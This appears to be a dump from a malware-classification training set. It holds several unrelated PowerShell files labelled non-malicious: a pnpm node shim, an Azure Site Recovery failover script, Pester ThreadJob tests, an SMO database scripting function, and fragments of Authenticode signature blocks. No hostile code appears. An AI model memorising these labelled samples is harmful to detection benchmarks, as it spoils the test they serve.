ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT # JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe # blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCEY0cP9rtDRtAt # ZUb0m4bGAtFex6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MA0GCSqGSIb3DQEBCwUAAgUA6snSCDAiGA8yMDI0MTAyODA5MDQwOFoYDzIwMjQx # MDI5MDkwNDA4WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqydIIAgEAMAoCAQAC # AgiwAgH/MAcCAQACAhLGMAoCBQDqyyOIAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG # CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL # BQADggEBADNJzLXAFulwDG4ktiexNvYLVH/Vlc9FOtX7vDiLPH6hc4cBS71ocYbS # pI4GOTtWDIK+MUyKtPXUcgsEFMdOIlwDXPlvk4h3KzRFZZycsJAZIoi2bwo02l4T # 6gT2+JBEcwuxT/dvyG7NYQdMN447JzzA1UgkJw9cMZCDjZh/Woyqg+mrIKYxNKOf # ddDSeWWY14YJ5SR0iw1OnAPiZttVc9Wr4ptW3+Nq0lnDditOePODWPkB2uiUD9o3 # cKMzSB/blfAMRNqfPsotseR/PmDEA3yolNhtI6jIZNivxyXlGquun7SPCmUr5L0V # VSnBk20pTBhI2I5KwD1Llt8OY6Bx3yQxggQNMIIECQIBATCBkzB8MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg # VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAf7QqMJ7NCELAQABAAAB/jANBglghkgB # ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3 # DQEJBDEiBCC1pW64ou9ICus2dta9LP3JtwQ4Yg6417qYZONrOSi1CDCB+gYLKoZI # hvcNAQkQAi8xgeowgecwgeQwgb0EIBGFzN38U8ifGNH3abaE9apz68Y4bX78jRa2 # QKy3KHR5MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA # AAH+0KjCezQhCwEAAQAAAf4wIgQgEdpvkq3zQZh4gWo+N1cBUbQciDORDclLAfrk # pRpKe+gwDQYJKoZIhvcNAQELBQAEggIAkHcQ0CnXIP7YyWS4AmsAL1iai5WsO8Oh # Z5WdWYcJfbrgzY8bmw0VQE/1r1ozZN0+mBS1XfHwdvvWfkpx5MS35GVkyRHYTRDB # 0me6Ein5MbeiSUUpu8HnVAaKlNfVGFSJHi7NzkEIrkcS8dlIwV0o3mGVAcQdZSjl # lq/vS2jh2DzSROvsy78v1GLPM/seiBOxBU3Mln14U31fnBPu+5Anrf8D1lRgS4km # eVXwHoCEzUf/Wx2xye+ZN03WKDuAtJZedwlayNQsFxA3314GdNkVkSc1yFKFIRui # Y/WilACb8VM4lcx+F9QJcCZu3zZZXMUUwsxnab73E/bIPGkxiPPo7MgYjNtbddzu # MOyelt4daScaN5xLQ9k6vndZ33dBkvMHm6L2t9Y8bdVg8/ASn2UIOpEWq5PA4RrY # qjbn7keAXMbDpwWePa4uUjvpQR8b8JzazHH/Zao1XjCTZfgS+X1UwAseMes0xJqV # N5X/ASChbtvtaUxbN3F1jFO8Snuizy0RuzJbpveg6WC6297cts2Y/xZNCaLkABvR # 8cExq9d7ckRCABdNyDWTN90Hy2wLNAWtLW+//IBMiKin3ZaTHmrl3Z1W1yd1Jtof # cfsiKysZSD/26CxiQqQwCUR0ckLBHYp0lND8XuctoM2PjZeE3/2Z/dW9JNnENORG # TJqE+IA7lHc= # SIG # End signature block
combined_dataset/train/non-malicious/sample_26_55.ps1
sample_26_55.ps1
#!/usr/bin/env pwsh $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent $exe="" $pathsep=":" $env_node_path=$env:NODE_PATH $new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules" if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) { # Fix case when both the Windows and Linux builds of Node # are installed in the same directory $exe=".exe" $pathsep=";" } else { $new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules" } if ([string]::IsNullOrEmpty($env_node_path)) { $env:NODE_PATH=$new_node_path } else { $env:NODE_PATH="$new_node_path$pathsep$env_node_path" } $ret=0 if (Test-Path "$basedir/node$exe") { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "$basedir/node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args } else { & "$basedir/node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args } $ret=$LASTEXITCODE } else { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args } else { & "node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args } $ret=$LASTEXITCODE } $env:NODE_PATH=$env_node_path exit $ret
combined_dataset/train/non-malicious/995.ps1
995.ps1
Param( [parameter(Mandatory=$true)] $CsvFilePath ) $ErrorActionPreference = "Stop" $scriptsPath = $PSScriptRoot if ($PSScriptRoot -eq "") { $scriptsPath = "." } . "$scriptsPath\asr_logger.ps1" . "$scriptsPath\asr_common.ps1" . "$scriptsPath\asr_csv_processor.ps1" Function ProcessItemImpl($processor, $csvItem, $reportItem) { $reportItem | Add-Member NoteProperty "FailoverJobId" $null $vaultName = $csvItem.VAULT_NAME $sourceMachineName = $csvItem.SOURCE_MACHINE_NAME $sourceConfigurationServer = $csvItem.CONFIGURATION_SERVER $protectedItem = $asrCommon.GetProtectedItemFromVault($vaultName, $sourceMachineName, $sourceConfigurationServer) if ($protectedItem -ne $null) { if ($protectedItem.AllowedOperations.Contains('UnplannedFailover')) { $processor.Logger.LogTrace("Starting UnplannedFailover operation for item '$($sourceMachineName)'") $targetFailoverJob = Start-AzRecoveryServicesAsrUnplannedFailoverJob ` -ReplicationProtectedItem $protectedItem ` -Direction PrimaryToRecovery $reportItem.FailoverJobId = $targetFailoverJob.ID } else { $processor.Logger.LogTrace("UnplannedFailover operation not allowed for item '$($sourceMachineName)'") } } else { $processor.Logger.LogTrace("'$($sourceMachineName)' item is not in a protected state ready for replication") } } Function ProcessItem($processor, $csvItem, $reportItem) { try { ProcessItemImpl $processor $csvItem $reportItem } catch { $exceptionMessage = $_ | Out-String $processor.Logger.LogError($exceptionMessage) throw } } $logger = New-AsrLoggerInstance -CommandPath $PSCommandPath $asrCommon = New-AsrCommonInstance -Logger $logger $processor = New-CsvProcessorInstance -Logger $logger -ProcessItemFunction $function:ProcessItem $processor.ProcessFile($CsvFilePath)
combined_dataset/train/non-malicious/1777.ps1
1777.ps1
function Wait-ForJobRunning { param ( $job ) $iteration = 10 Do { Start-Sleep -Milliseconds 100 } Until (($job.State -match "Running|Completed|Failed") -or (--$iteration -eq 0)) if ($job.State -notmatch "Running|Completed|Failed") { throw ("Cannot start job '{0}'. Job state is '{1}'" -f $job,$job.State) } } Describe 'Basic ThreadJob Tests' -Tags 'CI' { BeforeAll { $scriptFilePath1 = Join-Path $testdrive "TestThreadJobFile1.ps1" @' for ($i=0; $i -lt 10; $i++) { Write-Output "Hello $i" } '@ > $scriptFilePath1 $scriptFilePath2 = Join-Path $testdrive "TestThreadJobFile2.ps1" @' param ($arg1, $arg2) Write-Output $arg1 Write-Output $arg2 '@ > $scriptFilePath2 $scriptFilePath3 = Join-Path $testdrive "TestThreadJobFile3.ps1" @' $input | foreach { Write-Output $_ } '@ > $scriptFilePath3 $scriptFilePath4 = Join-Path $testdrive "TestThreadJobFile4.ps1" @' Write-Output $using:Var1 Write-Output $($using:Array1)[2] Write-Output @(,$using:Array1) '@ > $scriptFilePath4 $scriptFilePath5 = Join-Path $testdrive "TestThreadJobFile5.ps1" @' param ([string]$param1) Write-Output "$param1 $using:Var1 $using:Var2" '@ > $scriptFilePath5 $WaitForCountFnScript = @' function Wait-ForExpectedRSCount { param ( $expectedRSCount ) $iteration = 20 while ((@(Get-Runspace).Count -ne $expectedRSCount) -and ($iteration-- -gt 0)) { Start-Sleep -Milliseconds 100 } } '@ } AfterEach { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force } It 'ThreadJob with ScriptBlock' { $job = Start-ThreadJob -ScriptBlock { "Hello" } $results = $job | Receive-Job -Wait $results | Should -Be "Hello" } It 'ThreadJob with ScriptBlock and Initialization script' { $job = Start-ThreadJob -ScriptBlock { "Goodbye" } -InitializationScript { "Hello" } $results = $job | Receive-Job -Wait $results[0] | Should -Be "Hello" $results[1] | Should -Be "Goodbye" } It 'ThreadJob with ScriptBlock and Argument list' { $job = Start-ThreadJob -ScriptBlock { param ($arg1, $arg2) $arg1; $arg2 } -ArgumentList @("Hello","Goodbye") $results = $job | Receive-Job -Wait $results[0] | Should -Be "Hello" $results[1] | Should -Be "Goodbye" } It 'ThreadJob with ScriptBlock and piped input' { $job = "Hello","Goodbye" | Start-ThreadJob -ScriptBlock { $input | ForEach-Object { $_ } } $results = $job | Receive-Job -Wait $results[0] | Should -Be "Hello" $results[1] | Should -Be "Goodbye" } It 'ThreadJob with ScriptBlock and Using variables' { $Var1 = "Hello" $Var2 = "Goodbye" $Var3 = 102 $Var4 = 1..5 $global:GVar1 = "GlobalVar" $job = Start-ThreadJob -ScriptBlock { Write-Output $using:Var1 Write-Output $using:Var2 Write-Output $using:Var3 Write-Output ($using:Var4)[1] Write-Output @(,$using:Var4) Write-Output $using:GVar1 } $results = $job | Receive-Job -Wait $results[0] | Should -Be $Var1 $results[1] | Should -Be $Var2 $results[2] | Should -Be $Var3 $results[3] | Should -Be 2 $results[4] | Should -Be $Var4 $results[5] | Should -Be $global:GVar1 } It 'ThreadJob with ScriptBlock and Using variables and argument list' { $Var1 = "Hello" $Var2 = 52 $job = Start-ThreadJob -ScriptBlock { param ([string] $param1) "$using:Var1 $param1 $using:Var2" } -ArgumentList "There" $results = $job | Receive-Job -Wait $results | Should -Be "Hello There 52" } It 'ThreadJob with ScriptFile' { $job = Start-ThreadJob -FilePath $scriptFilePath1 $results = $job | Receive-Job -Wait $results | Should -HaveCount 10 $results[9] | Should -Be "Hello 9" } It 'ThreadJob with ScriptFile and Initialization script' { $job = Start-ThreadJob -FilePath $scriptFilePath1 -Initialization { "Goodbye" } $results = $job | Receive-Job -Wait $results | Should -HaveCount 11 $results[0] | Should -Be "Goodbye" } It 'ThreadJob with ScriptFile and Argument list' { $job = Start-ThreadJob -FilePath $scriptFilePath2 -ArgumentList @("Hello","Goodbye") $results = $job | Receive-Job -Wait $results[0] | Should -Be "Hello" $results[1] | Should -Be "Goodbye" } It 'ThreadJob with ScriptFile and piped input' { $job = "Hello","Goodbye" | Start-ThreadJob -FilePath $scriptFilePath3 $results = $job | Receive-Job -Wait $results[0] | Should -Be "Hello" $results[1] | Should -Be "Goodbye" } It 'ThreadJob with ScriptFile and Using variables' { $Var1 = "Hello!" $Array1 = 1..10 $job = Start-ThreadJob -FilePath $scriptFilePath4 $results = $job | Receive-Job -Wait $results[0] | Should -Be $Var1 $results[1] | Should -Be 3 $results[2] | Should -Be $Array1 } It 'ThreadJob with ScriptFile and Using variables with argument list' { $Var1 = "There" $Var2 = 60 $job = Start-ThreadJob -FilePath $scriptFilePath5 -ArgumentList "Hello" $results = $job | Receive-Job -Wait $results | Should -Be "Hello There 60" } It 'ThreadJob with terminating error' { $job = Start-ThreadJob -ScriptBlock { throw "MyError!" } $job | Wait-Job $job.JobStateInfo.Reason.Message | Should -Be "MyError!" } It 'ThreadJob and Error stream output' { $job = Start-ThreadJob -ScriptBlock { Write-Error "ErrorOut" } | Wait-Job $job.Error | Should -Be "ErrorOut" } It 'ThreadJob and Warning stream output' { $job = Start-ThreadJob -ScriptBlock { Write-Warning "WarningOut" } | Wait-Job $job.Warning | Should -Be "WarningOut" } It 'ThreadJob and Verbose stream output' { $job = Start-ThreadJob -ScriptBlock { $VerbosePreference = 'Continue'; Write-Verbose "VerboseOut" } | Wait-Job $job.Verbose | Should Match "VerboseOut" } It 'ThreadJob and Verbose stream output' { $job = Start-ThreadJob -ScriptBlock { $DebugPreference = 'Continue'; Write-Debug "DebugOut" } | Wait-Job $job.Debug | Should -Be "DebugOut" } It 'ThreadJob ThrottleLimit and Queue' { try { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force $job1 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 2 $job2 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } $job3 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } $job4 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } Wait-ForJobRunning $job2 Get-Job | Where-Object { ($_.PSJobTypeName -eq "ThreadJob") -and ($_.State -eq "Running") } | Should -HaveCount 2 Get-Job | Where-Object { ($_.PSJobTypeName -eq "ThreadJob") -and ($_.State -eq "NotStarted") } | Should -HaveCount 2 } finally { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force } Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Should -HaveCount 0 } It 'ThreadJob Runspaces should be cleaned up at completion' { $script = $WaitForCountFnScript + @' try { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force $rsStartCount = @(Get-Runspace).Count $Job1 = Start-ThreadJob -ScriptBlock { "Hello 1!" } -ThrottleLimit 5 $job2 = Start-ThreadJob -ScriptBlock { "Hello 2!" } $job3 = Start-ThreadJob -ScriptBlock { "Hello 3!" } $job4 = Start-ThreadJob -ScriptBlock { "Hello 4!" } $null = $job1,$job2,$job3,$job4 | Wait-Job Wait-ForExpectedRSCount $rsStartCount Write-Output (@(Get-Runspace).Count -eq $rsStartCount) } finally { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force } '@ $result = & "$PSHOME/pwsh" -c $script $result | Should -BeExactly "True" } It 'ThreadJob Runspaces should be cleaned up after job removal' { $script = $WaitForCountFnScript + @' try { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force $rsStartCount = @(Get-Runspace).Count $Job1 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 2 $job2 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } $job3 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } $job4 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } Wait-ForExpectedRSCount ($rsStartCount + 4) Write-Output (@(Get-Runspace).Count -eq ($rsStartCount + 4)) $job1 | Remove-Job -Force $job3 | Remove-Job -Force Wait-ForExpectedRSCount ($rsStartCount + 2) Write-Output (@(Get-Runspace).Count -eq ($rsStartCount + 2)) } finally { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force } Wait-ForExpectedRSCount $rsStartCount Write-Output (@(Get-Runspace).Count -eq $rsStartCount) '@ $result = & "$PSHOME/pwsh" -c $script $result | Should -BeExactly "True","True","True" } It 'ThreadJob jobs should work with Receive-Job -AutoRemoveJob' { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force $job1 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } } -ThrottleLimit 5 $job2 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } } $job3 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } } $job4 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } } $null = $job1,$job2,$job3,$job4 | Receive-Job -Wait -AutoRemoveJob Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Should -HaveCount 0 } It 'ThreadJob jobs should run in FullLanguage mode by default' { $result = Start-ThreadJob -ScriptBlock { $ExecutionContext.SessionState.LanguageMode } | Wait-Job | Receive-Job $result | Should -Be "FullLanguage" } } Describe 'Job2 class API tests' -Tags 'CI' { AfterEach { Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force } It 'Verifies StopJob API' { $job = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 5 Wait-ForJobRunning $job $job.StopJob($true, "No Reason") $job.JobStateInfo.State | Should -Be "Stopped" } It 'Verifies StopJobAsync API' { $job = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 5 Wait-ForJobRunning $job $job.StopJobAsync($true, "No Reason") Wait-Job $job $job.JobStateInfo.State | Should -Be "Stopped" } It 'Verifies StartJobAsync API' { $jobRunning = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 1 $jobNotRunning = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } $jobNotRunning.JobStateInfo.State | Should -Be "NotStarted" $jobNotRunning.StartJobAsync() Wait-ForJobRunning $jobNotRunning $jobNotRunning.JobStateInfo.State | Should -Be "Running" } It 'Verifies JobSourceAdapter Get-Jobs' { $job = Start-ThreadJob -ScriptBlock { "Hello" } | Wait-Job $getJob = Get-Job -InstanceId $job.InstanceId 2> $null $getJob | Should -Be $job $getJob = Get-Job -Name $job.Name 2> $null $getJob | Should -Be $job $getJob = Get-Job -Command ' "hello" ' 2> $null $getJob | Should -Be $job $getJob = Get-Job -State $job.JobStateInfo.State 2> $null $getJob | Should -Be $job $getJob = Get-Job -Id $job.Id 2> $null $getJob | Should -Be $job $result = Get-Job -Filter @{Id = ($job.Id)} 3> $null $result | Should -BeNullOrEmpty } It 'Verifies terminating job error' { $job = Start-ThreadJob -ScriptBlock { throw "My Job Error!" } | Wait-Job $results = $job | Receive-Job 2>&1 $results.ToString() | Should -Be "My Job Error!" } }
combined_dataset/train/non-malicious/2597.ps1
2597.ps1
function global:Script-DBObjectsIntoFolders([string]$server, [string]$dbname){ [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SMO") | out-null $SMOserver = New-Object (’Microsoft.SqlServer.Management.Smo.Server’) -argumentlist $server $db = $SMOserver.databases[$dbname] $Objects = $db.Tables $Objects += $db.Views $Objects += $db.StoredProcedures $Objects += $db.UserDefinedFunctions $Objects += $db.Schemas $Objects += $db.Triggers $SavePath = "E:\Dexma\Temp\Databases\" + $($dbname) $DateFolder = get-date -format yyyyMMddHHmm new-item -type directory -name "$DateFolder"-path "$SavePath" foreach ($ScriptThis in $Objects | where {!($_.IsSystemObject)}) { $scriptr = new-object ('Microsoft.SqlServer.Management.Smo.Scripter') ($SMOserver) $scriptr.Options.AppendToFile = $True $scriptr.Options.AllowSystemObjects = $False $scriptr.Options.ClusteredIndexes = $True $scriptr.Options.DriAll = $True $scriptr.Options.ScriptDrops = $False $scriptr.Options.IncludeHeaders = $True $scriptr.Options.ToFileOnly = $True $scriptr.Options.Indexes = $True $scriptr.Options.Permissions = $True $scriptr.Options.WithDependencies = $False $ScriptDrop = new-object ('Microsoft.SqlServer.Management.Smo.Scripter') ($SMOserver) $ScriptDrop.Options.AppendToFile = $True $ScriptDrop.Options.AllowSystemObjects = $False $ScriptDrop.Options.ClusteredIndexes = $True $ScriptDrop.Options.DriAll = $True $ScriptDrop.Options.ScriptDrops = $True $ScriptDrop.Options.IncludeHeaders = $True $ScriptDrop.Options.ToFileOnly = $True $ScriptDrop.Options.Indexes = $True $ScriptDrop.Options.WithDependencies = $False $TypeFolder=$ScriptThis.GetType().Name if ((Test-Path -Path "$SavePath\$DateFolder\$TypeFolder") -eq "true") ` {"Scripting Out $TypeFolder $ScriptThis"} ` else {new-item -type directory -name "$TypeFolder"-path "$SavePath\$DateFolder"} $ScriptFile = $ScriptThis -replace "\[|\]" $ScriptDrop.Options.FileName = "" + $($SavePath) + "\" + $($DateFolder) + "\" + $($TypeFolder) + "\" + $($ScriptFile) + ".SQL" $scriptr.Options.FileName = "$SavePath\$DateFolder\$TypeFolder\$ScriptFile.SQL" IF ($ScriptThis.GetType().Name -NE "Table") { $ScriptDrop.Script($ScriptThis) } $scriptr.Script($ScriptThis) } } Script-DBObjectsIntoFolders "XSQLUTIL19" "CitizensFirst_NdxTest"
combined_dataset/train/non-malicious/sample_20_76.ps1
sample_20_76.ps1
'This script has been deprecated. Please use the PowerShell version TS_Virtualization.ps1 '' SIG '' Begin signature block '' SIG '' MIIoUAYJKoZIhvcNAQcCoIIoQTCCKD0CAQExDzANBglg '' SIG '' hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor '' SIG '' BgEEAYI3AgEeMCQCAQEEEE7wKRaZJ7VNj+Ws4Q8X66sC '' SIG '' AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg '' SIG '' 9GrSZqZ7yd3ColGjrbQUtEE+NyBkMfBBz6rN4EUp6u2g '' SIG '' gg2FMIIGAzCCA+ugAwIBAgITMwAABAO91ZVdDzsYrQAA '' SIG '' AAAEAzANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV '' SIG '' UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH '' SIG '' UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv '' SIG '' cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT '' SIG '' aWduaW5nIFBDQSAyMDExMB4XDTI0MDkxMjIwMTExM1oX '' SIG '' DTI1MDkxMTIwMTExM1owdDELMAkGA1UEBhMCVVMxEzAR '' SIG '' BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v '' SIG '' bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv '' SIG '' bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u '' SIG '' MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA '' SIG '' n3RnXcCDp20WFMoNNzt4s9fV12T5roRJlv+bshDfvJoM '' SIG '' ZfhyRnixgUfGAbrRlS1St/EcXFXD2MhRkF3CnMYIoeMO '' SIG '' MuMyYtxr2sC2B5bDRMUMM/r9I4GP2nowUthCWKFIS1RP '' SIG '' lM0YoVfKKMaH7bJii29sW+waBUulAKN2c+Gn5znaiOxR '' SIG '' qIu4OL8f9DCHYpME5+Teek3SL95sH5GQhZq7CqTdM0fB '' SIG '' w/FmLLx98SpBu7v8XapoTz6jJpyNozhcP/59mi/Fu4tT '' SIG '' 2rI2vD50Vx/0GlR9DNZ2py/iyPU7DG/3p1n1zluuRp3u '' SIG '' XKjDfVKH7xDbXcMBJid22a3CPbuC2QJLowIDAQABo4IB '' SIG '' gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB '' SIG '' BQUHAwMwHQYDVR0OBBYEFOpuKgJKc+OuNYitoqxfHlrE '' SIG '' gXAZMFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy '' SIG '' b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx '' SIG '' FjAUBgNVBAUTDTIzMDAxMis1MDI5MjYwHwYDVR0jBBgw '' SIG '' FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w '' SIG '' SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t '' SIG '' L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx '' SIG '' LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB '' SIG '' BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w '' SIG '' a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx '' SIG '' LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 '' SIG '' DQEBCwUAA4ICAQBRaP+hOC1+dSKhbqCr1LIvNEMrRiOQ '' SIG '' EkPc7D6QWtM+/IbrYiXesNeeCZHCMf3+6xASuDYQ+AyB '' SIG '' TX0YlXSOxGnBLOzgEukBxezbfnhUTTk7YB2/TxMUcuBC '' SIG '' P45zMM0CVTaJE8btloB6/3wbFrOhvQHCILx41jTd6kUq '' SIG '' 4bIBHah3NG0Q1H/FCCwHRGTjAbyiwq5n/pCTxLz5XYCu '' SIG '' 4RTvy/ZJnFXuuwZynowyju90muegCToTOwpHgE6yRcTv '' SIG '' Ri16LKCr68Ab8p8QINfFvqWoEwJCXn853rlkpp4k7qzw '' SIG '' lBNiZ71uw2pbzjQzrRtNbCFQAfmoTtsHFD2tmZvQIg1Q '' SIG '' VkzM/V1KCjHL54ItqKm7Ay4WyvqWK0VIEaTbdMtbMWbF '' SIG '' zq2hkRfJTNnFr7RJFeVC/k0DNaab+bpwx5FvCUvkJ3z2 '' SIG '' wfHWVUckZjEOGmP7cecefrF+rHpif/xW4nJUjMUiPsyD '' SIG '' btY2Hq3VMLgovj+qe0pkJgpYQzPukPm7RNhbabFNFvq+ '' SIG '' kXWBX/z/pyuo9qLZfTb697Vi7vll5s/DBjPtfMpyfpWG '' SIG '' 0phVnAI+0mM4gH09LCMJUERZMgu9bbCGVIQR7cT5YhlL '' SIG '' t+tpSDtC6XtAzq4PJbKZxFjpB5wk+SRJ1gm87olbfEV9 '' SIG '' SFdO7iL3jWbjgVi1Qs1iYxBmvh4WhLWr48uouzCCB3ow '' SIG '' ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL '' SIG '' BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo '' SIG '' aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK '' SIG '' ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT '' SIG '' KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv '' SIG '' cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw '' SIG '' ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT '' SIG '' Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc '' SIG '' BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG '' SIG '' A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg '' SIG '' MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC '' SIG '' ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq '' SIG '' uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ '' SIG '' DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X '' SIG '' llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL '' SIG '' bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 '' SIG '' pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt '' SIG '' 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 '' SIG '' Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP '' SIG '' rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl '' SIG '' mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE '' SIG '' tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 '' SIG '' G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C '' SIG '' HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp '' SIG '' pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A '' SIG '' 